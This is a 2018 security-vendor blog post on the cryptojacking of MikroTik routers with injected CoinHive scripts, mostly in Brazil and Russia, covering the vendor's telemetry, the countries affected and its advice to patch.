Cryptocurrency miner hits IoT devices, mostly affects Brazil and Russia!

Credit to Author: Pradeep Kulkarni| Date: Thu, 09 Aug 2018 08:46:11 +0000

Estimated reading time: 3 minutesAccording to a blogpost published on Aug 1, 2018, 200,000 routers in Brazil were compromised to deliver Cryptocurrency mining scripts to mine Monero (XMR) cryptocurrency. Hackers compromised the vulnerable MikroTik routers by injecting CoinHive scripts into the routers web pages in order to carry out the mass Cryptocurrency miner attack. The IDS/IPS research team at Quick Heal Security Labs was observing the attack and soon started digging into the telemetry to find out the traces of the attack. The data mining effort landed us on traces of the attack observed at our customers which were completely blocked by Quick Heal’s IDS/IPS solution. The telemetry data recorded the hits for IDS/IPS signatures from the period July 30, 2018, to Aug 4, 2018. We did not see hits after Aug 4, 2018. We believe the infected routers were cleaned up and patched against the vulnerability which led to the attack. Fig 1. IDS/IPS signature hits The compromised URLs accessed were having a typical structure like this: http://<Router IP Address>/<Random String>.php The sample URL set received in telemetry looks like below. Fig 2. Compromised URL telemetry At the time of the analysis, the compromised pages did not deliver the Cryptocurrency miner code as most of them were down. A typical injected CoinHive JavaScript looks like the below: Fig 3. CoinHive Injection To know more about how CoinHive cryptocurrency works read this blogpost. The fingerprint of one the router is shown below which clearly indicates the device being of MikroTik. Fig 4. Fingerprint of compromised IP – MikroTik device The most affected country was Brazil followed by Russia. We also saw countries like Vietnam, the Republic of Moldova and the United States being affected. Fig 5. Affected Countries This shows the intensity of the mass router compromise which in turn would have affected many users. This also shows the importance of patching the well-known vulnerabilities. There is a challenge to update the routers or IoT devices but we strongly recommend to get familiar with the upgrade process for various IoT devices and regularly update them with the latest patches. Even though the MikroTik had issued a patch against this vulnerability in April 2018, the affected devices were not patched which led to this massive router compromise. To defend against such attacks, it’s really important to patch all sorts of devices. Quick Heal IDS/IPS Detection HTTP/CoinhiveMiner.UN!KP.4461 – Coinhive miner requests Reference https://www.trustwave.com/Resources/SpiderLabs-Blog/Mass-MikroTik-Router-Infection-%E2%80%93-First-we-cryptojack-Brazil,-then-we-take-the-World-/ Subject Matter Expert Pradeep Kulkarni | Quick Heal Security Labs The post Cryptocurrency miner hits IoT devices, mostly affects Brazil and Russia! appeared first on Quick Heal Blog | Latest computer security news, tips, and advice.
http://blogs.quickheal.com/feed/